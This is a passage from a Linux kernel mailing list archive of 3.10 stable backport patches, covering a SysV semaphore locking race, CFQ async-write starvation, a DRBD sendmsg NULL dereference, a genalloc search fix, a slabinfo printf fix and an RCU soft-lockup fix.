+	bool			complex_mode;	/* no parallel simple ops */
 };
 
 #ifdef CONFIG_SYSVIPC
diff --git a/ipc/sem.c b/ipc/sem.c
index 57242be..94c6ec5 100644
--- a/ipc/sem.c
+++ b/ipc/sem.c
@@ -155,14 +155,21 @@ static int sysvipc_sem_proc_show(struct seq_file *s, void *it);
 
 /*
  * Locking:
+ * a) global sem_lock() for read/write
  *	sem_undo.id_next,
  *	sem_array.complex_count,
- *	sem_array.pending{_alter,_cont},
- *	sem_array.sem_undo: global sem_lock() for read/write
- *	sem_undo.proc_next: only "current" is allowed to read/write that field.
+ *	sem_array.complex_mode
+ *	sem_array.pending{_alter,_const},
+ *	sem_array.sem_undo
  *	
+ * b) global or semaphore sem_lock() for read/write:
  *	sem_array.sem_base[i].pending_{const,alter}:
- *		global or semaphore sem_lock() for read/write
+ *	sem_array.complex_mode (for read)
+ *
+ * c) special:
+ *	sem_undo_list.list_proc:
+ *	* undo_list->lock for write
+ *	* rcu for read
  */
 
 #define sc_semmsl	sem_ctls[0]
@@ -263,24 +270,25 @@ static void sem_rcu_free(struct rcu_head *head)
 #define ipc_smp_acquire__after_spin_is_unlocked()	smp_rmb()
 
 /*
- * Wait until all currently ongoing simple ops have completed.
+ * Enter the mode suitable for non-simple operations:
  * Caller must own sem_perm.lock.
- * New simple ops cannot start, because simple ops first check
- * that sem_perm.lock is free.
- * that a) sem_perm.lock is free and b) complex_count is 0.
  */
-static void sem_wait_array(struct sem_array *sma)
+static void complexmode_enter(struct sem_array *sma)
 {
 	int i;
 	struct sem *sem;
 
-	if (sma->complex_count)  {
-		/* The thread that increased sma->complex_count waited on
-		 * all sem->lock locks. Thus we don't need to wait again.
-		 */
+	if (sma->complex_mode)  {
+		/* We are already in complex_mode. Nothing to do */
 		return;
 	}
 
+	/* We need a full barrier after seting complex_mode:
+	 * The write to complex_mode must be visible
+	 * before we read the first sem->lock spinlock state.
+	 */
+	set_mb(sma->complex_mode, true);
+
 	for (i = 0; i < sma->sem_nsems; i++) {
 		sem = sma->sem_base + i;
 		spin_unlock_wait(&sem->lock);
@@ -289,6 +297,28 @@ static void sem_wait_array(struct sem_array *sma)
 }
 
 /*
+ * Try to leave the mode that disallows simple operations:
+ * Caller must own sem_perm.lock.
+ */
+static void complexmode_tryleave(struct sem_array *sma)
+{
+	if (sma->complex_count)  {
+		/* Complex ops are sleeping.
+		 * We must stay in complex mode
+		 */
+		return;
+	}
+	/*
+	 * Immediately after setting complex_mode to false,
+	 * a simple op can start. Thus: all memory writes
+	 * performed by the current operation must be visible
+	 * before we set complex_mode to false.
+	 */
+	smp_store_release(&sma->complex_mode, false);
+}
+
+#define SEM_GLOBAL_LOCK	(-1)
+/*
  * If the request contains only one semaphore operation, and there are
  * no complex transactions pending, lock only the semaphore involved.
  * Otherwise, lock the entire semaphore array, since we either have
@@ -304,55 +334,42 @@ static inline int sem_lock(struct sem_array *sma, struct sembuf *sops,
 		/* Complex operation - acquire a full lock */
 		ipc_lock_object(&sma->sem_perm);
 
-		/* And wait until all simple ops that are processed
-		 * right now have dropped their locks.
-		 */
-		sem_wait_array(sma);
-		return -1;
+		/* Prevent parallel simple ops */
+		complexmode_enter(sma);
+		return SEM_GLOBAL_LOCK;
 	}
 
 	/*
 	 * Only one semaphore affected - try to optimize locking.
-	 * The rules are:
-	 * - optimized locking is possible if no complex operation
-	 *   is either enqueued or processed right now.
-	 * - The test for enqueued complex ops is simple:
-	 *      sma->complex_count != 0
-	 * - Testing for complex ops that are processed right now is
-	 *   a bit more difficult. Complex ops acquire the full lock
-	 *   and first wait that the running simple ops have completed.
-	 *   (see above)
-	 *   Thus: If we own a simple lock and the global lock is free
-	 *	and complex_count is now 0, then it will stay 0 and
-	 *	thus just locking sem->lock is sufficient.
+	 * Optimized locking is possible if no complex operation
+	 * is either enqueued or processed right now.
+	 *
+	 * Both facts are tracked by complex_mode.
 	 */
 	sem = sma->sem_base + sops->sem_num;
 
-	if (sma->complex_count == 0) {
+	/*
+	 * Initial check for complex_mode. Just an optimization,
+	 * no locking, no memory barrier.
+	 */
+	if (!sma->complex_mode) {
 		/*
 		 * It appears that no complex operation is around.
 		 * Acquire the per-semaphore lock.
 		 */
 		spin_lock(&sem->lock);
 
-		/* Then check that the global lock is free */
-		if (!spin_is_locked(&sma->sem_perm.lock)) {
-			/*
-			 * We need a memory barrier with acquire semantics,
-			 * otherwise we can race with another thread that does:
-			 *	complex_count++;
-			 *	spin_unlock(sem_perm.lock);
-			 */
-			ipc_smp_acquire__after_spin_is_unlocked();
+		/*
+		 * See 51d7d5205d33
+		 * ("powerpc: Add smp_mb() to arch_spin_is_locked()"):
+		 * A full barrier is required: the write of sem->lock
+		 * must be visible before the read is executed
+		 */
+		smp_mb();
 
-			/* Now repeat the test of complex_count:
-			 * It can't change anymore until we drop sem->lock.
-			 * Thus: if is now 0, then it will stay 0.
-			 */
-			if (sma->complex_count == 0) {
-				/* fast path successful! */
-				return sops->sem_num;
-			}
+		if (!smp_load_acquire(&sma->complex_mode)) {
+			/* fast path successful! */
+			return sops->sem_num;
 		}
 		spin_unlock(&sem->lock);
 	}
@@ -372,15 +389,16 @@ static inline int sem_lock(struct sem_array *sma, struct sembuf *sops,
 		/* Not a false alarm, thus complete the sequence for a
 		 * full lock.
 		 */
-		sem_wait_array(sma);
-		return -1;
+		complexmode_enter(sma);
+		return SEM_GLOBAL_LOCK;
 	}
 }
 
 static inline void sem_unlock(struct sem_array *sma, int locknum)
 {
-	if (locknum == -1) {
+	if (locknum == SEM_GLOBAL_LOCK) {
 		unmerge_queues(sma);
+		complexmode_tryleave(sma);
 		ipc_unlock_object(&sma->sem_perm);
 	} else {
 		struct sem *sem = sma->sem_base + locknum;
@@ -540,6 +558,7 @@ static int newary(struct ipc_namespace *ns, struct ipc_params *params)
 	}
 
 	sma->complex_count = 0;
+	sma->complex_mode = true; /* dropped by sem_unlock below */
 	INIT_LIST_HEAD(&sma->pending_alter);
 	INIT_LIST_HEAD(&sma->pending_const);
 	INIT_LIST_HEAD(&sma->list_id);
@@ -2165,10 +2184,10 @@ static int sysvipc_sem_proc_show(struct seq_file *s, void *it)
 	/*
 	 * The proc interface isn't aware of sem_lock(), it calls
 	 * ipc_lock_object() directly (in sysvipc_find_ipc).
-	 * In order to stay compatible with sem_lock(), we must wait until
-	 * all simple semop() calls have left their critical regions.
+	 * In order to stay compatible with sem_lock(), we must
+	 * enter / leave complex_mode.
 	 */
-	sem_wait_array(sma);
+	complexmode_enter(sma);
 
 	sem_otime = get_semotime(sma);
 
@@ -2185,6 +2204,8 @@ static int sysvipc_sem_proc_show(struct seq_file *s, void *it)
 		   sem_otime,
 		   sma->sem_ctime);
 
+	complexmode_tryleave(sma);
+
 	return 0;
 }
 #endif
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 283/319] cfq: fix starvation of asynchronous writes
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (181 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 282/319] ipc/sem.c: fix complex_count vs. simple op race Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 284/319] drbd: Fix kernel_sendmsg() usage - potential NULL deref Willy Tarreau
                   ` (35 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Glauber Costa, Jens Axboe, linux-block, Jens Axboe, Willy Tarreau

From: Glauber Costa <glauber@scylladb.com>

commit 3932a86b4b9d1f0b049d64d4591ce58ad18b44ec upstream.

While debugging timeouts happening in my application workload (ScyllaDB), I have
observed calls to open() taking a long time, ranging everywhere from 2 seconds -
the first ones that are enough to time out my application - to more than 30
seconds.

The problem seems to happen because XFS may block on pending metadata updates
under certain circumnstances, and that's confirmed with the following backtrace
taken by the offcputime tool (iovisor/bcc):

    ffffffffb90c57b1 finish_task_switch
    ffffffffb97dffb5 schedule
    ffffffffb97e310c schedule_timeout
    ffffffffb97e1f12 __down
    ffffffffb90ea821 down
    ffffffffc046a9dc xfs_buf_lock
    ffffffffc046abfb _xfs_buf_find
    ffffffffc046ae4a xfs_buf_get_map
    ffffffffc046babd xfs_buf_read_map
    ffffffffc0499931 xfs_trans_read_buf_map
    ffffffffc044a561 xfs_da_read_buf
    ffffffffc0451390 xfs_dir3_leaf_read.constprop.16
    ffffffffc0452b90 xfs_dir2_leaf_lookup_int
    ffffffffc0452e0f xfs_dir2_leaf_lookup
    ffffffffc044d9d3 xfs_dir_lookup
    ffffffffc047d1d9 xfs_lookup
    ffffffffc0479e53 xfs_vn_lookup
    ffffffffb925347a path_openat
    ffffffffb9254a71 do_filp_open
    ffffffffb9242a94 do_sys_open
    ffffffffb9242b9e sys_open
    ffffffffb97e42b2 entry_SYSCALL_64_fastpath
    00007fb0698162ed [unknown]

Inspecting my run with blktrace, I can see that the xfsaild kthread exhibit very
high "Dispatch wait" times, on the dozens of seconds range and consistent with
the open() times I have saw in that run.

Still from the blktrace output, we can after searching a bit, identify the
request that wasn't dispatched:

  8,0   11      152    81.092472813   804  A  WM 141698288 + 8 <- (8,1) 141696240
  8,0   11      153    81.092472889   804  Q  WM 141698288 + 8 [xfsaild/sda1]
  8,0   11      154    81.092473207   804  G  WM 141698288 + 8 [xfsaild/sda1]
  8,0   11      206    81.092496118   804  I  WM 141698288 + 8 (   22911) [xfsaild/sda1]
  <==== 'I' means Inserted (into the IO scheduler) ===================================>
  8,0    0   289372    96.718761435     0  D  WM 141698288 + 8 (15626265317) [swapper/0]
  <==== Only 15s later the CFQ scheduler dispatches the request ======================>

As we can see above, in this particular example CFQ took 15 seconds to dispatch
this request. Going back to the full trace, we can see that the xfsaild queue
had plenty of opportunity to run, and it was selected as the active queue many
times. It would just always be preempted by something else (example):

  8,0    1        0    81.117912979     0  m   N cfq1618SN / insert_request
  8,0    1        0    81.117913419     0  m   N cfq1618SN / add_to_rr
  8,0    1        0    81.117914044     0  m   N cfq1618SN / preempt
  8,0    1        0    81.117914398     0  m   N cfq767A  / slice expired t=1
  8,0    1        0    81.117914755     0  m   N cfq767A  / resid=40
  8,0    1        0    81.117915340     0  m   N / served: vt=1948520448 min_vt=1948520448
  8,0    1        0    81.117915858     0  m   N cfq767A  / sl_used=1 disp=0 charge=0 iops=1 sect=0

where cfq767 is the xfsaild queue and cfq1618 corresponds to one of the ScyllaDB
IO dispatchers.

The requests preempting the xfsaild queue are synchronous requests. That's a
characteristic of ScyllaDB workloads, as we only ever issue O_DIRECT requests.
While it can be argued that preempting ASYNC requests in favor of SYNC is part
of the CFQ logic, I don't believe that doing so for 15+ seconds is anyone's
goal.

Moreover, unless I am misunderstanding something, that breaks the expectation
set by the "fifo_expire_async" tunable, which in my system is set to the
default.

Looking at the code, it seems to me that the issue is that after we make
an async queue active, there is no guarantee that it will execute any request.

When the queue itself tests if it cfq_may_dispatch() it can bail if it sees SYNC
requests in flight. An incoming request from another queue can also preempt it
in such situation before we have the chance to execute anything (as seen in the
trace above).

This patch sets the must_dispatch flag if we notice that we have requests
that are already fifo_expired. This flag is always cleared after
cfq_dispatch_request() returns from cfq_dispatch_requests(), so it won't pin
the queue for subsequent requests (unless they are themselves expired)

Care is taken during preempt to still allow rt requests to preempt us
regardless.

Testing my workload with this patch applied produces much better results.
>From the application side I see no timeouts, and the open() latency histogram
generated by systemtap looks much better, with the worst outlier at 131ms:

Latency histogram of xfs_buf_lock acquisition (microseconds):
 value |-------------------------------------------------- count
     0 |                                                     11
     1 |@@@@                                                161
     2 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  1966
     4 |@                                                    54
     8 |                                                     36
    16 |                                                      7
    32 |                                                      0
    64 |                                                      0
       ~
  1024 |                                                      0
  2048 |                                                      0
  4096 |                                                      1
  8192 |                                                      1
 16384 |                                                      2
 32768 |                                                      0
 65536 |                                                      0
131072 |                                                      1
262144 |                                                      0
524288 |                                                      0

Signed-off-by: Glauber Costa <glauber@scylladb.com>
CC: Jens Axboe <axboe@kernel.dk>
CC: linux-block@vger.kernel.org
CC: linux-kernel@vger.kernel.org
Signed-off-by: Glauber Costa <glauber@scylladb.com>
Signed-off-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 block/cfq-iosched.c | 13 ++++++++++---
 1 file changed, 10 insertions(+), 3 deletions(-)

diff --git a/block/cfq-iosched.c b/block/cfq-iosched.c
index 69111c5..ddb0ebb 100644
--- a/block/cfq-iosched.c
+++ b/block/cfq-iosched.c
@@ -2812,7 +2812,6 @@ static struct request *cfq_check_fifo(struct cfq_queue *cfqq)
 	if (time_before(jiffies, rq_fifo_time(rq)))
 		rq = NULL;
 
-	cfq_log_cfqq(cfqq->cfqd, cfqq, "fifo=%p", rq);
 	return rq;
 }
 
@@ -3186,6 +3185,9 @@ static bool cfq_may_dispatch(struct cfq_data *cfqd, struct cfq_queue *cfqq)
 {
 	unsigned int max_dispatch;
 
+	if (cfq_cfqq_must_dispatch(cfqq))
+		return true;
+
 	/*
 	 * Drain async requests before we start sync IO
 	 */
@@ -3277,15 +3279,20 @@ static bool cfq_dispatch_request(struct cfq_data *cfqd, struct cfq_queue *cfqq)
 
 	BUG_ON(RB_EMPTY_ROOT(&cfqq->sort_list));
 
+	rq = cfq_check_fifo(cfqq);
+	if (rq)
+		cfq_mark_cfqq_must_dispatch(cfqq);
+
 	if (!cfq_may_dispatch(cfqd, cfqq))
 		return false;
 
 	/*
 	 * follow expired path, else get first next available
 	 */
-	rq = cfq_check_fifo(cfqq);
 	if (!rq)
 		rq = cfqq->next_rq;
+	else
+		cfq_log_cfqq(cfqq->cfqd, cfqq, "fifo=%p", rq);
 
 	/*
 	 * insert request into driver dispatch list
@@ -3794,7 +3801,7 @@ cfq_should_preempt(struct cfq_data *cfqd, struct cfq_queue *new_cfqq,
 	 * if the new request is sync, but the currently running queue is
 	 * not, let the sync request have priority.
 	 */
-	if (rq_is_sync(rq) && !cfq_cfqq_sync(cfqq))
+	if (rq_is_sync(rq) && !cfq_cfqq_sync(cfqq) && !cfq_cfqq_must_dispatch(cfqq))
 		return true;
 
 	if (new_cfqq->cfqg != cfqq->cfqg)
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 284/319] drbd: Fix kernel_sendmsg() usage - potential NULL deref
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (182 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 283/319] cfq: fix starvation of asynchronous writes Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 285/319] lib/genalloc.c: start search from start of chunk Willy Tarreau
                   ` (34 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Richard Weinberger, viro, christoph.lechleitner, wolfgang.glas,
	Lars Ellenberg, Jens Axboe, Willy Tarreau

From: Richard Weinberger <richard@nod.at>

commit d8e9e5e80e882b4f90cba7edf1e6cb7376e52e54 upstream.

Don't pass a size larger than iov_len to kernel_sendmsg().
Otherwise it will cause a NULL pointer deref when kernel_sendmsg()
returns with rv < size.

DRBD as external module has been around in the kernel 2.4 days already.
We used to be compatible to 2.4 and very early 2.6 kernels,
we used to use
 rv = sock_sendmsg(sock, &msg, iov.iov_len);
then later changed to
 rv = kernel_sendmsg(sock, &msg, &iov, 1, size);
when we should have used
 rv = kernel_sendmsg(sock, &msg, &iov, 1, iov.iov_len);

tcp_sendmsg() used to totally ignore the size parameter.
 57be5bd ip: convert tcp_sendmsg() to iov_iter primitives
changes that, and exposes our long standing error.

Even with this error exposed, to trigger the bug, we would need to have
an environment (config or otherwise) causing us to not use sendpage()
for larger transfers, a failing connection, and have it fail "just at the
right time".  Apparently that was unlikely enough for most, so this went
unnoticed for years.

Still, it is known to trigger at least some of these,
and suspected for the others:
[0] http://lists.linbit.com/pipermail/drbd-user/2016-July/023112.html
[1] http://lists.linbit.com/pipermail/drbd-dev/2016-March/003362.html
[2] https://forums.grsecurity.net/viewtopic.php?f=3&t=4546
[3] https://ubuntuforums.org/showthread.php?t=2336150
[4] http://e2.howsolveproblem.com/i/1175162/

This should go into 4.9,
and into all stable branches since and including v4.0,
which is the first to contain the exposing change.

It is correct for all stable branches older than that as well
(which contain the DRBD driver; which is 2.6.33 and up).

It requires a small "conflict" resolution for v4.4 and earlier, with v4.5
we dropped the comment block immediately preceding the kernel_sendmsg().

Fixes: b411b3637fa7 ("The DRBD driver")
Cc: viro@zeniv.linux.org.uk
Cc: christoph.lechleitner@iteg.at
Cc: wolfgang.glas@iteg.at
Reported-by: Christoph Lechleitner <christoph.lechleitner@iteg.at>
Tested-by: Christoph Lechleitner <christoph.lechleitner@iteg.at>
Signed-off-by: Richard Weinberger <richard@nod.at>
[changed oneliner to be "obvious" without context; more verbose message]
Signed-off-by: Lars Ellenberg <lars.ellenberg@linbit.com>
Signed-off-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/block/drbd/drbd_main.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/block/drbd/drbd_main.c b/drivers/block/drbd/drbd_main.c
index a5dca6a..776fc08 100644
--- a/drivers/block/drbd/drbd_main.c
+++ b/drivers/block/drbd/drbd_main.c
@@ -1771,7 +1771,7 @@ int drbd_send(struct drbd_tconn *tconn, struct socket *sock,
  * do we need to block DRBD_SIG if sock == &meta.socket ??
  * otherwise wake_asender() might interrupt some send_*Ack !
  */
-		rv = kernel_sendmsg(sock, &msg, &iov, 1, size);
+		rv = kernel_sendmsg(sock, &msg, &iov, 1, iov.iov_len);
 		if (rv == -EAGAIN) {
 			if (we_should_drop_the_connection(tconn, sock))
 				break;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 285/319] lib/genalloc.c: start search from start of chunk
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (183 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 284/319] drbd: Fix kernel_sendmsg() usage - potential NULL deref Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 286/319] tools/vm/slabinfo: fix an unintentional printf Willy Tarreau
                   ` (33 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Daniel Mentz, Andrew Morton, Linus Torvalds, Willy Tarreau

From: Daniel Mentz <danielmentz@google.com>

commit 62e931fac45b17c2a42549389879411572f75804 upstream.

gen_pool_alloc_algo() iterates over the chunks of a pool trying to find
a contiguous block of memory that satisfies the allocation request.

The shortcut

	if (size > atomic_read(&chunk->avail))
		continue;

makes the loop skip over chunks that do not have enough bytes left to
fulfill the request.  There are two situations, though, where an
allocation might still fail:

(1) The available memory is not contiguous, i.e.  the request cannot
    be fulfilled due to external fragmentation.

(2) A race condition.  Another thread runs the same code concurrently
    and is quicker to grab the available memory.

In those situations, the loop calls pool->algo() to search the entire
chunk, and pool->algo() returns some value that is >= end_bit to
indicate that the search failed.  This return value is then assigned to
start_bit.  The variables start_bit and end_bit describe the range that
should be searched, and this range should be reset for every chunk that
is searched.  Today, the code fails to reset start_bit to 0.  As a
result, prefixes of subsequent chunks are ignored.  Memory allocations
might fail even though there is plenty of room left in these prefixes of
those other chunks.

Fixes: 7f184275aa30 ("lib, Make gen_pool memory allocator lockless")
Link: http://lkml.kernel.org/r/1477420604-28918-1-git-send-email-danielmentz@google.com
Signed-off-by: Daniel Mentz <danielmentz@google.com>
Reviewed-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
Acked-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 lib/genalloc.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/lib/genalloc.c b/lib/genalloc.c
index 2a39bf6..ac5fba9 100644
--- a/lib/genalloc.c
+++ b/lib/genalloc.c
@@ -273,7 +273,7 @@ unsigned long gen_pool_alloc(struct gen_pool *pool, size_t size)
 	struct gen_pool_chunk *chunk;
 	unsigned long addr = 0;
 	int order = pool->min_alloc_order;
-	int nbits, start_bit = 0, end_bit, remain;
+	int nbits, start_bit, end_bit, remain;
 
 #ifndef CONFIG_ARCH_HAVE_NMI_SAFE_CMPXCHG
 	BUG_ON(in_nmi());
@@ -288,6 +288,7 @@ unsigned long gen_pool_alloc(struct gen_pool *pool, size_t size)
 		if (size > atomic_read(&chunk->avail))
 			continue;
 
+		start_bit = 0;
 		end_bit = chunk_size(chunk) >> order;
 retry:
 		start_bit = pool->algo(chunk->bits, end_bit, start_bit, nbits,
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 286/319] tools/vm/slabinfo: fix an unintentional printf
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (184 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 285/319] lib/genalloc.c: start search from start of chunk Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 287/319] rcu: Fix soft lockup for rcu_nocb_kthread Willy Tarreau
                   ` (32 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Dan Carpenter, Sergey Senozhatsky, Colin Ian King, Laura Abbott,
	Andrew Morton, Linus Torvalds, Willy Tarreau

From: Dan Carpenter <dan.carpenter@oracle.com>

commit 2d6a4d64812bb12dda53704943b61a7496d02098 upstream.

The curly braces are missing here so we print stuff unintentionally.

Fixes: 9da4714a2d44 ('slub: slabinfo update for cmpxchg handling')
Link: http://lkml.kernel.org/r/20160715211243.GE19522@mwanda
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Acked-by: Christoph Lameter <cl@linux.com>
Cc: Sergey Senozhatsky <sergey.senozhatsky@gmail.com>
Cc: Colin Ian King <colin.king@canonical.com>
Cc: Laura Abbott <labbott@fedoraproject.org>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 tools/vm/slabinfo.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/tools/vm/slabinfo.c b/tools/vm/slabinfo.c
index 808d5a9..bcc6125 100644
--- a/tools/vm/slabinfo.c
+++ b/tools/vm/slabinfo.c
@@ -493,10 +493,11 @@ static void slab_stats(struct slabinfo *s)
 			s->alloc_node_mismatch, (s->alloc_node_mismatch * 100) / total);
 	}
 
-	if (s->cmpxchg_double_fail || s->cmpxchg_double_cpu_fail)
+	if (s->cmpxchg_double_fail || s->cmpxchg_double_cpu_fail) {
 		printf("\nCmpxchg_double Looping\n------------------------\n");
 		printf("Locked Cmpxchg Double redos   %lu\nUnlocked Cmpxchg Double redos %lu\n",
 			s->cmpxchg_double_fail, s->cmpxchg_double_cpu_fail);
+	}
 }
 
 static void report(struct slabinfo *s)
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 287/319] rcu: Fix soft lockup for rcu_nocb_kthread
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (185 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 286/319] tools/vm/slabinfo: fix an unintentional printf Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 288/319] ratelimit: fix bug in time interval by resetting right begin time Willy Tarreau
                   ` (31 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Ding Tianhong, Paul E . McKenney, Dhaval Giani, Jiri Slaby,
	Willy Tarreau

From: Ding Tianhong <dingtianhong@huawei.com>

commit bedc1969150d480c462cdac320fa944b694a7162 upstream.

Carrying out the following steps results in a softlockup in the
RCU callback-offload (rcuo) kthreads:

1. Connect to ixgbevf, and set the speed to 10Gb/s.
2. Use ifconfig to bring the nic up and down repeatedly.

[  317.005148] IPv6: ADDRCONF(NETDEV_CHANGE): eth2: link becomes ready
[  368.106005] BUG: soft lockup - CPU#1 stuck for 22s! [rcuos/1:15]
[  368.106005] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011
[  368.106005] task: ffff88057dd8a220 ti: ffff88057dd9c000 task.ti: ffff88057dd9c000
[  368.106005] RIP: 0010:[<ffffffff81579e04>]  [<ffffffff81579e04>] fib_table_lookup+0x14/0x390
[  368.106005] RSP: 0018:ffff88061fc83ce8  EFLAGS: 00000286
[  368.106005] RAX: 0000000000000001 RBX: 00000000020155c0 RCX: 0000000000000001
[  368.106005] RDX: ffff88061fc83d50 RSI: ffff88061fc83d70 RDI: ffff880036d11a00
[  368.106005] RBP: ffff88061fc83d08 R08: 0000000000000001 R09: 0000000000000000
[  368.106005] R10: ffff880036d11a00 R11: ffffffff819e0900 R12: ffff88061fc83c58
[  368.106005] R13: ffffffff816154dd R14: ffff88061fc83d08 R15: 00000000020155c0
[  368.106005] FS:  0000000000000000(0000) GS:ffff88061fc80000(0000) knlGS:0000000000000000
[  368.106005] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  368.106005] CR2: 00007f8c2aee9c40 CR3: 000000057b222000 CR4: 00000000000407e0
[  368.106005] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[  368.106005] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
[  368.106005] Stack:
[  368.106005]  00000000010000c0 ffff88057b766000 ffff8802e380b000 ffff88057af03e00
[  368.106005]  ffff88061fc83dc0 ffffffff815349a6 ffff88061fc83d40 ffffffff814ee146
[  368.106005]  ffff8802e380af00 00000000e380af00 ffffffff819e0900 020155c0010000c0
[  368.106005] Call Trace:
[  368.106005]  <IRQ>
[  368.106005]
[  368.106005]  [<ffffffff815349a6>] ip_route_input_noref+0x516/0xbd0
[  368.106005]  [<ffffffff814ee146>] ? skb_release_data+0xd6/0x110
[  368.106005]  [<ffffffff814ee20a>] ? kfree_skb+0x3a/0xa0
[  368.106005]  [<ffffffff8153698f>] ip_rcv_finish+0x29f/0x350
[  368.106005]  [<ffffffff81537034>] ip_rcv+0x234/0x380
[  368.106005]  [<ffffffff814fd656>] __netif_receive_skb_core+0x676/0x870
[  368.106005]  [<ffffffff814fd868>] __netif_receive_skb+0x18/0x60
[  368.106005]  [<ffffffff814fe4de>] process_backlog+0xae/0x180
[  368.106005]  [<ffffffff814fdcb2>] net_rx_action+0x152/0x240
[  368.106005]  [<ffffffff81077b3f>] __do_softirq+0xef/0x280
[  368.106005]  [<ffffffff8161619c>] call_softirq+0x1c/0x30
[  368.106005]  <EOI>
[  368.106005]
[  368.106005]  [<ffffffff81015d95>] do_softirq+0x65/0xa0
[  368.106005]  [<ffffffff81077174>] local_bh_enable+0x94/0xa0
[  368.106005]  [<ffffffff81114922>] rcu_nocb_kthread+0x232/0x370
[  368.106005]  [<ffffffff81098250>] ? wake_up_bit+0x30/0x30
[  368.106005]  [<ffffffff811146f0>] ? rcu_start_gp+0x40/0x40
[  368.106005]  [<ffffffff8109728f>] kthread+0xcf/0xe0
[  368.106005]  [<ffffffff810971c0>] ? kthread_create_on_node+0x140/0x140
[  368.106005]  [<ffffffff816147d8>] ret_from_fork+0x58/0x90
[  368.106005]  [<ffffffff810971c0>] ? kthread_create_on_node+0x140/0x140

==================================cut here==============================

It turns out that the rcuos callback-offload kthread is busy processing
a very large quantity of RCU callbacks, and it is not reliquishing the
CPU while doing so.  This commit therefore adds an cond_resched_rcu_qs()
within the loop to allow other tasks to run.

[js] use onlu cond_resched() in 3.12

Signed-off-by: Ding Tianhong <dingtianhong@huawei.com>
[ paulmck: Substituted cond_resched_rcu_qs for cond_resched. ]
Signed-off-by: Paul E. McKenney <paulmck@linux.vnet.ibm.com>
Cc: Dhaval Giani <dhaval.giani@oracle.com>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 kernel/rcutree_plugin.h | 1 +
 1 file changed, 1 insertion(+)

diff --git a/kernel/rcutree_plugin.h b/kernel/rcutree_plugin.h
index 3db5a37..468786b 100644
--- a/kernel/rcutree_plugin.h
+++ b/kernel/rcutree_plugin.h
@@ -2243,6 +2243,7 @@ static int rcu_nocb_kthread(void *arg)
 				cl++;
 			c++;
 			local_bh_enable();
+			cond_resched();
 			list = next;
 		}
 		trace_rcu_batch_end(rdp->rsp->name, c, !!list, 0, 0, 1);
-- 
2.8.0.rc2.1.gbe9624a

